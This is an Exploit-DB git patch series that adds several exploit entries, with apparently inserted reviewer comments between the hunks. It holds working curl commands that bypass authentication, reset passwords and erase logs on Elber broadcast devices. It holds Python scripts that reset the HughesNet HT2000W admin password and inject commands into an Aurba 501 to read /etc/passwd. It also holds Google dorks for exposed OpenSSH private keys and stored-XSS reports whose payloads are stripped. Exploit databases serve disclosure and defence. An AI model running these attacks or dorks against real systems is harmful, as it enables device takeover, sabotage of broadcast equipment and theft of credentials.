From 809d81619e7de523c33f1757a06a759295b0f917 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Sat, 24 Aug 2024 00:16:35 +0000 Subject: [PATCH 1/2] DB: 2024-08-24 4 changes to exploits/shellcodes/ghdb Calibre-web 0.6.21 - Stored XSS Helpdeskz v2.0.2 - Stored XSS --- exploits/multiple/webapps/52067.txt | 21 +++++++++++++++++++++ exploits/php/webapps/52068.txt | 29 +++++++++++++++++++++++++++++ files_exploits.csv | 2 ++ ghdb.xml | 24 ++++++++++++++++++++++++ 4 files changed, 76 insertions(+) create mode 100644 exploits/multiple/webapps/52067.txt create mode 100644 exploits/php/webapps/52068.txt diff --git a/exploits/multiple/webapps/52067.txt b/exploits/multiple/webapps/52067.txt new file mode 100644 index 0000000000..219b62180a --- /dev/null +++ b/exploits/multiple/webapps/52067.txt @@ -0,0 +1,21 @@ +# Exploit Title: Stored XSS in Calibre-web +# Date: 07/05/2024 +# Exploit Authors: Pentest-Tools.com (Catalin Iovita & Alexandru Postolache) +# Vendor Homepage: (https://github.com/janeczku/calibre-web/) +# Version: 0.6.21 - Romesa +# Tested on: Linux 5.15.0-107, Python 3.10.12, lxml 4.9.4 +# CVE: CVE-2024-39123 + +## Vulnerability Description +Calibre-web 0.6.21 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. + +## Steps to Reproduce +1. Log in to the application. +2. Upload a new book. +3. Access the Books List functionality from the `/table?data=list&sort_param=stored` endpoint. +4. In the `Comments` field, input the following payload: + + Hello there! + +4. Save the changes. +5. Upon clicking the description on the book that was created, in the Book Details, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script. \ No newline at end of file 
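Review bot: The payload in step 4 (`4. In the \`Comments\` field, input the following payload:`) survives in this hunk only as the bare text `Hello there!` — the markup that turned it into a payload was lost on commit, so the entry no longer shows what the Comments field fails to sanitise before it is rendered as the book Description. The step numbering also repeats `4.` (`4. Save the changes.` should be `5.` and the last step `6.`). For triage the entry should name the release that fixes the Description rendering, if one exists; the header names only the affected `0.6.21`.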
diff --git a/exploits/php/webapps/52068.txt b/exploits/php/webapps/52068.txt new file mode 100644 index 0000000000..093a12a66c --- /dev/null +++ b/exploits/php/webapps/52068.txt @@ -0,0 +1,29 @@ +# Exploit Title: Stored XSS Vulnerability via File Name +# Google Dork: N/A +# Date: 08 Aug 2024 +# Exploit Author: Md. Sadikul Islam +# Vendor Homepage: https://www.helpdeskz.com/ +# Software Link: +https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip +# Version: v2.0.2 +# Tested on: Kali Linux / Firefox 115.1.0esr (64-bit) +# CVE : N/A + +Payload: "> +Filename can be Payload: ">.jpg + +VIdeo PoC: +https://drive.google.com/file/d/1_yh0UsX8h7YcSU1kFvg_bBwk9T7kx1K1/view?usp=drive_link + +Steps to Reproduce: + 1. Log in as a regular user and create a new ticket. + 2. Fill out all the required fields with the necessary information. + 3. Attach an image file with a malicious payload embedded in the +filename. + 4. Submit the ticket. + 5. Access the ticket from the administration panel to trigger the +payload execution. + +Cross-Site Scripting (XSS) exploits can compromise the administration +panel, directly affecting administrators by allowing malicious scripts to +execute within their privileged environment. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1732e9626f..046a34c119 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
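Review bot: Both `Payload:` lines survive only as `">` — the element the filename was meant to close was stripped on commit, so the entry no longer shows which attribute context the admin ticket view renders the attachment filename into. The `# Software Link:` header is also split across two lines (`+https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip` on a line of its own), which breaks the one-field-per-line header format used elsewhere, and `VIdeo PoC:` has a stray capital. A mitigation line would make the entry useful to operators: HTML-escape attachment filenames wherever the administration panel renders them and normalise or reject filenames containing `<`, `>` or `"` at upload time.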
@@ -11754,6 +11754,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48791,exploits/multiple/webapps/48791.txt,"Cabot 0.11.12 - Persistent Cross-Site Scripting",2020-09-07,"Abhiram V",webapps,multiple,,2020-09-07,2020-09-07,0,,,,,,
 48144,exploits/multiple/webapps/48144.py,"Cacti 1.2.8 - Authenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/4877c2b2f378ce5937f56b259b69b02840514d4c/Cacti-postauth-rce.py
 48145,exploits/multiple/webapps/48145.py,"Cacti 1.2.8 - Unauthenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/dfb48378f39249ff54ecf24ccd3b89db26971ccf/Cacti-preauth-rce.py
+52067,exploits/multiple/webapps/52067.txt,"Calibre-web 0.6.21 - Stored XSS",2024-08-23,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-23,2024-08-23,0,,,,,,
 18430,exploits/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",webapps,multiple,,2012-01-30,2012-01-30,0,OSVDB-78888,,,,,
 18247,exploits/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",webapps,multiple,,2011-12-16,2011-12-16,1,OSVDB-77998;CVE-2011-5031,,,,,
 50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",2022-02-28,"Mayank Deshmukh",webapps,multiple,,2022-02-28,2022-02-28,0,CVE-2022-24124,,,,,
@@ -19615,6 +19616,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 10788,exploits/php/webapps/10788.txt,"Helpdesk Pilot Knowledge Base 4.4.0 - SQL Injection",2009-12-29,kaMtiEz,webapps,php,,2009-12-28,,1,,,,,,
 40300,exploits/php/webapps/40300.py,"HelpDeskZ 1.0.2 - Arbitrary File Upload",2016-08-29,"Lars Morgenroth",webapps,php,80,2016-08-29,2020-05-26,0,,,,,http://www.exploit-db.comHelpDeskZ-1.0-master.zip,
 41200,exploits/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",webapps,php,,2017-01-30,2017-01-31,1,,,,http://www.exploit-db.com/screenshots/idlt41500/screen-shot-2017-01-30-at-222713.png,http://www.exploit-db.comHelpDeskZ-1.0-master.zip,
+52068,exploits/php/webapps/52068.txt,"Helpdeskz v2.0.2 - Stored XSS",2024-08-23,"Md. Sadikul Islam",webapps,php,,2024-08-23,2024-08-23,0,,,,,,
 45847,exploits/php/webapps/45847.txt,"Helpdezk 1.1.1 - 'query' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80,2018-11-14,2018-11-14,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comhelpdezk-1.1.1.zip,
 45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,80,2018-11-16,2018-11-20,0,,,,,,
 41824,exploits/php/webapps/41824.txt,"HelpDEZK 1.1.1 - Cross-Site Request Forgery / Code Execution",2017-04-05,rungga_reksya,webapps,php,,2017-04-06,2017-04-06,0,CVE-2017-7447;CVE-2017-7446,,,,http://www.exploit-db.comhelpdezk-1.1.1.zip,
diff --git a/ghdb.xml b/ghdb.xml
index e699157325..6977d0be6a 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -60756,6 +60756,18 @@ Sajan Dhakate 2020-10-19 Sajan Dhakate + + 8452 + https://www.exploit-db.com/ghdb/8452 + Files Containing Passwords + ext:nix "BEGIN OPENSSH PRIVATE KEY" + ext:nix "BEGIN OPENSSH PRIVATE KEY" + ext:nix "BEGIN OPENSSH PRIVATE KEY" + https://www.google.com/search?q=ext:nix "BEGIN OPENSSH PRIVATE KEY" + + 2024-08-23 + kstrawn0 + 1239 https://www.exploit-db.com/ghdb/1239 @@ -65035,6 +65047,18 @@ See also: http://www.elladodelmal.com/2017/02/cloudshark-tus-credenciales-en-las 2021-11-15 Anirudh Kumar Kushwaha + + 8451 + https://www.exploit-db.com/ghdb/8451 + Files Containing Passwords + site:github.com "BEGIN OPENSSH PRIVATE KEY" + site:github.com "BEGIN OPENSSH PRIVATE KEY" + site:github.com "BEGIN OPENSSH PRIVATE KEY" + https://www.google.com/search?q=site:github.com "BEGIN OPENSSH PRIVATE KEY" + + 2024-08-23 + kstrawn0 + 4299 https://www.exploit-db.com/ghdb/4299 From 76d99ff06ef169fbf2362deedeff769113473bdc Mon Sep 17 00:00:00 2001 
From: Exploit-DB Date: Sun, 25 Aug 2024 00:16:25 +0000 Subject: [PATCH 2/2] DB: 2024-08-25 7 changes to exploits/shellcodes/ghdb Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Authentication Bypass Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config Elber Wayber Analog/Digital Audio STL 4.00 - Authentication Bypass Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure HughesNet HT2000W Satellite Modem - Password Reset Aurba 501 - Authenticated RCE --- exploits/hardware/webapps/52069.txt | 68 ++++++++++++++++++++ exploits/hardware/webapps/52070.txt | 69 +++++++++++++++++++++ exploits/hardware/webapps/52071.txt | 70 +++++++++++++++++++++ exploits/hardware/webapps/52072.txt | 71 +++++++++++++++++++++ exploits/hardware/webapps/52073.py | 96 +++++++++++++++++++++++++++++ exploits/linux/webapps/52074.py | 90 +++++++++++++++++++++++++++ files_exploits.csv | 6 ++ 7 files changed, 470 insertions(+) create mode 100644 exploits/hardware/webapps/52069.txt create mode 100644 exploits/hardware/webapps/52070.txt create mode 100644 exploits/hardware/webapps/52071.txt create mode 100644 exploits/hardware/webapps/52072.txt create mode 100755 exploits/hardware/webapps/52073.py create mode 100755 exploits/linux/webapps/52074.py diff --git a/exploits/hardware/webapps/52069.txt b/exploits/hardware/webapps/52069.txt new file mode 100644 index 0000000000..a5d34ad7d8 --- /dev/null +++ b/exploits/hardware/webapps/52069.txt 
@@ -0,0 +1,68 @@ +Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass + + +Vendor: Elber S.r.l. +Product web page: https://www.elber.it +Affected version: 1.5.179 Revision 904 + 1.5.56 Revision 884 + 1.229 Revision 440 + +Summary: ESE (Elber Satellite Equipment) product line, designed for the +high-end radio contribution and distribution market, where quality and +reliability are most important. The Elber IRD (Integrated Receiver Decoder) +ESE-01 offers a professional audio quality (and composite video) at an +excellent quality/price ratio. The development of digital satellite contribution +networks and the need to connect a large number of sites require a cheap +but reliable and performing satellite receiver with integrated decoder. + +Desc: The device suffers from an authentication bypass vulnerability through +a direct and unauthorized access to the password management functionality. The +issue allows attackers to bypass authentication by manipulating the set_pwd +endpoint that enables them to overwrite the password of any user within the +system. This grants unauthorized and administrative access to protected areas +of the application compromising the device's system security. 
+ +-------------------------------------------------------------------------- +/modules/pwd.html +------------------ +50: function apply_pwd(level, pwd) +51: { +52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, +53: function(data){ +54: //$.alert({title:'Operation',text:data}); +55: show_message(data); +56: }).fail(function(error){ +57: show_message('Error ' + error.status, 'error'); +58: }); +59: } + +-------------------------------------------------------------------------- + +Tested on: NBFM Controller + embOS/IP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2024-5820 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php + + +18.08.2023 + +-- + + +$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 + +Ref (lev param): + +Level 7 = SNMP Write Community (snmp_write_pwd) +Level 6 = SNMP Read Community (snmp_read_pwd) +Level 5 = Custom Password? hidden. (custom_pwd) +Level 4 = Display Password (display_pwd)? +Level 2 = Administrator Password (admin_pwd) +Level 1 = Super User Password (puser_pwd) +Level 0 = User Password (user_pwd) \ No newline at end of file diff --git a/exploits/hardware/webapps/52070.txt b/exploits/hardware/webapps/52070.txt new file mode 100644 index 0000000000..fc941972e3 --- /dev/null +++ b/exploits/hardware/webapps/52070.txt 
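Review bot: The `apply_pwd` listing at `52: $.get("json_data/set_pwd", {lev:level, pass:pwd}` shows the password change is a GET carrying the new password in the query string, so besides the missing authorisation check the advisory should note that changed passwords end up in web-server, proxy and browser-history logs; the same path is also what a defender can alert on (requests to `json_data/set_pwd` with no preceding login). The `Ref (lev param)` table lists levels 7, 6, 5, 4, 2, 1 and 0 and skips 3, so it is unclear whether that level exists or was omitted — say which. No vendor fix or workaround is named; at minimum the entry should recommend keeping the management interface off untrusted networks until a patched firmware is identified. 52071.txt carries the identical listing and table and has the same gaps.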
@@ -0,0 +1,69 @@ +Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config + + +Vendor: Elber S.r.l. +Product web page: https://www.elber.it +Affected version: 1.5.179 Revision 904 + 1.5.56 Revision 884 + 1.229 Revision 440 + +Summary: ESE (Elber Satellite Equipment) product line, designed for the +high-end radio contribution and distribution market, where quality and +reliability are most important. The Elber IRD (Integrated Receiver Decoder) +ESE-01 offers a professional audio quality (and composite video) at an +excellent quality/price ratio. The development of digital satellite contribution +networks and the need to connect a large number of sites require a cheap +but reliable and performing satellite receiver with integrated decoder. + +Desc: The device suffers from an unauthenticated device configuration and +client-side hidden functionality disclosure. + +Tested on: NBFM Controller + embOS/IP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2024-5821 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php + + +18.08.2023 + +-- + + +# Config fan +$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' +Configuration applied + +# Delete config +$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' +File delete successfully + +# Launch upgrade +$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' +Upgrade launched Successfully + +# Log erase +$ curl 'http://TARGET/json_data/erase_log.js?until=-2' +Logs erased + +# Until: +# =0 ALL +# =-2 Yesterday +# =-8 Last week +# =-15 Last two weeks +# =-22 Last three weeks +# =-31 Last month + +# Set RX config +$ curl 
'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' +RX Config Applied Successfully + +# Show factory window and FPGA upload (Console) +> cleber_show_factory_wnd() + +# Etc. \ No newline at end of file diff --git a/exploits/hardware/webapps/52071.txt b/exploits/hardware/webapps/52071.txt new file mode 100644 index 0000000000..0e0592543f --- /dev/null +++ b/exploits/hardware/webapps/52071.txt 
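Review bot: The `Desc:` line calls this an `unauthenticated device configuration and client-side hidden functionality disclosure`, but the commands listed after `--` change state: `conf_cmd?index=4&cmd=2` is labelled `Delete config`, `cmd=1` is `Launch upgrade`, and `erase_log.js?until=` erases logs, so the impact is unauthenticated configuration modification, upgrade triggering and log destruction, not disclosure. The description should say so, and the index title `Device Config` understates it the same way. Because the device's own logs can be wiped, a mitigation note should tell operators to forward device logs off-box and to restrict the management interface to a dedicated management network. 52072.txt has the same description and the same command list.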
@@ -0,0 +1,70 @@ +Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass + + +Vendor: Elber S.r.l. +Product web page: https://www.elber.it +Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) + Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) + Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) + Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) + Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) + Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) + Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) + +Summary: Wayber II is the name of an analogue/digital microwave link +able to transport a Mono or a MPX stereo signal from studio to audio +transmitter. Compact and reliable, it features very high quality and +modern technology both in signal processing and microwave section leading +to outstanding performances. + +Desc: The device suffers from an authentication bypass vulnerability through +a direct and unauthorized access to the password management functionality. The +issue allows attackers to bypass authentication by manipulating the set_pwd +endpoint that enables them to overwrite the password of any user within the +system. This grants unauthorized and administrative access to protected areas +of the application compromising the device's system security. 
+ +-------------------------------------------------------------------------- +/modules/pwd.html +------------------ +50: function apply_pwd(level, pwd) +51: { +52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, +53: function(data){ +54: //$.alert({title:'Operation',text:data}); +55: show_message(data); +56: }).fail(function(error){ +57: show_message('Error ' + error.status, 'error'); +58: }); +59: } + +-------------------------------------------------------------------------- + +Tested on: NBFM Controller + embOS/IP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2024-5822 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5822.php + + +18.08.2023 + +-- + + +$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 + +Ref (lev param): + +Level 7 = SNMP Write Community (snmp_write_pwd) +Level 6 = SNMP Read Community (snmp_read_pwd) +Level 5 = Custom Password? hidden. (custom_pwd) +Level 4 = Display Password (display_pwd)? +Level 2 = Administrator Password (admin_pwd) +Level 1 = Super User Password (puser_pwd) +Level 0 = User Password (user_pwd) \ No newline at end of file diff --git a/exploits/hardware/webapps/52072.txt b/exploits/hardware/webapps/52072.txt new file mode 100644 index 0000000000..866aa6cc6c --- /dev/null +++ b/exploits/hardware/webapps/52072.txt 
@@ -0,0 +1,71 @@ +Elber Wayber Analog/Digital Audio STL 4.00 Device Config + + +Vendor: Elber S.r.l. +Product web page: https://www.elber.it +Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) + Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) + Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) + Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) + Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) + Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) + Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) + +Summary: Wayber II is the name of an analogue/digital microwave link +able to transport a Mono or a MPX stereo signal from studio to audio +transmitter. Compact and reliable, it features very high quality and +modern technology both in signal processing and microwave section leading +to outstanding performances. + +Desc: The device suffers from an unauthenticated device configuration and +client-side hidden functionality disclosure. 
+ +Tested on: NBFM Controller + embOS/IP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2024-5823 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php + + +18.08.2023 + +-- + + +# Config fan +$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' +Configuration applied + +# Delete config +$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' +File delete successfully + +# Launch upgrade +$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' +Upgrade launched Successfully + +# Log erase +$ curl 'http://TARGET/json_data/erase_log.js?until=-2' +Logs erased + +# Until: +# =0 ALL +# =-2 Yesterday +# =-8 Last week +# =-15 Last two weeks +# =-22 Last three weeks +# =-31 Last month + +# Set RX config +$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' +RX Config Applied Successfully + +# Show factory window and FPGA upload (Console) +> cleber_show_factory_wnd() + +# Etc. \ No newline at end of file diff --git a/exploits/hardware/webapps/52073.py b/exploits/hardware/webapps/52073.py new file mode 100755 index 0000000000..1c8d68c4d2 --- /dev/null +++ b/exploits/hardware/webapps/52073.py 
@@ -0,0 +1,96 @@ +# Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset +# Date: 7/16/24 +# Exploit Author: Simon Greenblatt +# Vendor: HughesNet +# Version: Arcadyan httpd 1.0 +# Tested on: Linux +# CVE: CVE-2021-20090 + +import sys +import requests +import re +import base64 +import hashlib +import urllib + +red = "\033[0;41m" +green = "\033[1;34;42m" +reset = "\033[0m" + +def print_banner(): + print(green + ''' + _____________ _______________ _______________ ________ ____ _______________ _______ _______________ + \_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/_ | \_____ \ _ \ \ _ \/ __ \ _ \ + / \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ | | ______ / ____/ /_\ \/ /_\ \____ / /_\ \ + \ \____\ / | \ /_____/ / \ \_/ \/ \ | | /_____/ / \ \_/ \ \_/ \ / /\ \_/ \ + \______ / \___/ /_______ / \_______ \_____ /\_______ \|___| \_______ \_____ /\_____ //____/ \_____ / + \/ \/ \/ \/ \/ \/ \/ \/ \/ \n''' + reset) + print(" Administrator password reset for HughesNet HT2000W Satellite Modem") + print(''' + Usage: python3 hughes_ht2000w_pass_reset.py + : The new administrator password + : The IP address of the web portal. If none is provided, the script will default to 192.168.42.1\n + This script takes advantage of CVE-2021-20090, a path traversal vulnerability in the HTTP daemon of the HT2000W modem to reset + the administrator password of the configuration portal. 
It also takes advantage of other vulnerabilities in the device such as + improper use of httokens for authentication and the portal allowing the MD5 hash of the password to be leaked.''') + return None + +def get_httoken(ip_address): + # Make a GET request to system_p.htm using path traversal + r = requests.get(f'http://{ip_address}/images/..%2fsystem_p.htm') + if r.status_code != 200: + print(red + f"(-) Failure: Could not request system_p.htm" + reset) + exit() + # Extract the httoken hidden in the DOM and convert it from Base64 + return base64.b64decode(re.search(r'AAAIBRAA7(.*?)"', r.text).group(1)).decode('ascii') + +def encode_pass(password): + # Vigenere Cipher + key = "wg7005d" + enc_pass = "" + idx = 0 + for c in password: + enc_pass += str(ord(c) + ord(key[idx])) + "+" + idx = (idx + 1) % len(key) + return enc_pass + +def change_pass(ip_address, httoken, enc_pass): + # Create a POST request with the httoken and the encoded password + headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'http://{ip_address}/system_p.htm'} + payload = {'action': 'ui_system_p', 'httoken': httoken, 'submit_button': 'system_p.htm', 'ARC_SYS_Password': enc_pass} + payload = urllib.parse.urlencode(payload, safe=':+') + try: + r = requests.post(f'http://{ip_address}/images/..%2fapply_abstract.cgi', data = payload, headers = headers) + except: + pass + return None + +def verify_pass(ip_address, new_pass): + # Make a GET request to cgi_sys_p.js to verify password + httoken = get_httoken(ip_address) + headers = {'Referer': f'http://{ip_address}/system_p.htm'} + r = requests.get(f'http://{ip_address}/images/..%2fcgi/cgi_sys_p.js?_tn={httoken}', headers = headers) + if r.text.split('"')[5] != hashlib.md5(bytes(new_pass, 'ascii')).hexdigest(): + print(red + "(-) Failure: Could not verify the hash of the password" + reset) + exit() + +def main(): + if not (len(sys.argv) == 2 or len(sys.argv) == 3): + print_banner() + return + new_pass = sys.argv[1] + ip_address = 
"192.168.42.1" + if sys.argv == 3: + ip_address = sys.argv[2] + httoken = get_httoken(ip_address) + print(f"[+] Obtained httoken: {httoken}") + enc_pass = encode_pass(new_pass) + change_pass(ip_address, httoken, enc_pass) + print(f"[+] Password reset to: {new_pass}") + verify_pass(ip_address, new_pass) + print("[+] Verified password hash: " + hashlib.md5(bytes(new_pass, 'ascii')).hexdigest()) + print("[+] Password successfully changed!") + return + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/linux/webapps/52074.py b/exploits/linux/webapps/52074.py new file mode 100755 index 0000000000..1d52ed768d --- /dev/null +++ b/exploits/linux/webapps/52074.py 
@@ -0,0 +1,90 @@ +# Exploit Title: Remote Command Execution | Aurba 501 +# Date: 17-07-2024 +# Exploit Author: Hosein Vita +# Vendor Homepage: https://www.hpe.com +# Version: Aurba 501 CN12G5W0XX +# Tested on: Linux + +import requests +from requests.auth import HTTPBasicAuth + + +def get_input(prompt, default_value): + user_input = input(prompt) + return user_input if user_input else default_value + + +base_url = input("Enter the base URL: ") +if not base_url: + print("Base URL is required.") + exit(1) + +username = get_input("Enter the username (default: admin): ", "admin") +password = get_input("Enter the password (default: admin): ", "admin") + + +login_url = f"{base_url}/login.cgi" +login_payload = { + "username": username, + "password": password, + "login": "Login" +} + + +login_headers = { + "Accept-Encoding": "gzip, deflate, br", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": base_url, + "Connection": "close" +} + +session = requests.Session() + + +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +# Login to the system +response = session.post(login_url, headers=login_headers, data=login_payload, verify=False) + +# Check if login was successful +if response.status_code == 200 and "login failed" not in response.text.lower(): + print("Login successful!") + + # The command to be executed on the device + command = "cat /etc/passwd" + + + ping_ip = f"4.2.2.4||{command}" + + # Data to be sent in the POST request + data = { + "ping_ip": ping_ip, + "ping_timeout": "1", + "textareai": "", + "ping_start": "Ping" + } + + # Headers to be sent with the request + headers = { + "Accept-Encoding": "gzip, deflate, br", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": base_url, + "Referer": f"{base_url}/admin.cgi?action=ping", + "Connection": "close" + } + + # Sending the HTTP POST request to exploit the vulnerability + exploit_url = f"{base_url}/admin.cgi?action=ping" + response = 
session.post(exploit_url, headers=headers, data=data, verify=False) + + + if any("root" in value for value in response.headers.values()): + print("Exploit successful! The /etc/passwd file contents are reflected in the headers:") + print(response.headers) + else: + print("Exploit failed. The response headers did not contain the expected output.") +else: + print("Login failed. Please check the credentials and try again.") + +# Print the response headers for further analysis +print(response.headers) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 046a34c119..ccc1d9e836 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
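Review bot: The file header says only `Remote Command Execution | Aurba 501`, while the index row calls it `Authenticated RCE` and the script logs in with default `admin`/`admin` before posting to `admin.cgi?action=ping` — the header should state that valid credentials are required and that the injection point is the `ping_ip` parameter, so the entry is triaged at the right severity. `requests.packages.urllib3.disable_warnings(...)` reaches through a vendored-package alias that `requests` does not guarantee; `import urllib3` and call `urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)` directly. A mitigation line for the device would help operators: validate `ping_ip` as an address literal and invoke ping without a shell.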
@@ -4372,10 +4372,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,,
 48774,exploits/hardware/webapps/48774.py,"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation",2020-08-28,LiquidWorm,webapps,hardware,,2020-08-28,2020-08-28,0,,,,,,
 52004,exploits/hardware/webapps/52004.txt,"Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
+52069,exploits/hardware/webapps/52069.txt,"Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Authentication Bypass",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,,
+52070,exploits/hardware/webapps/52070.txt,"Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,,
 52006,exploits/hardware/webapps/52006.txt,"Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
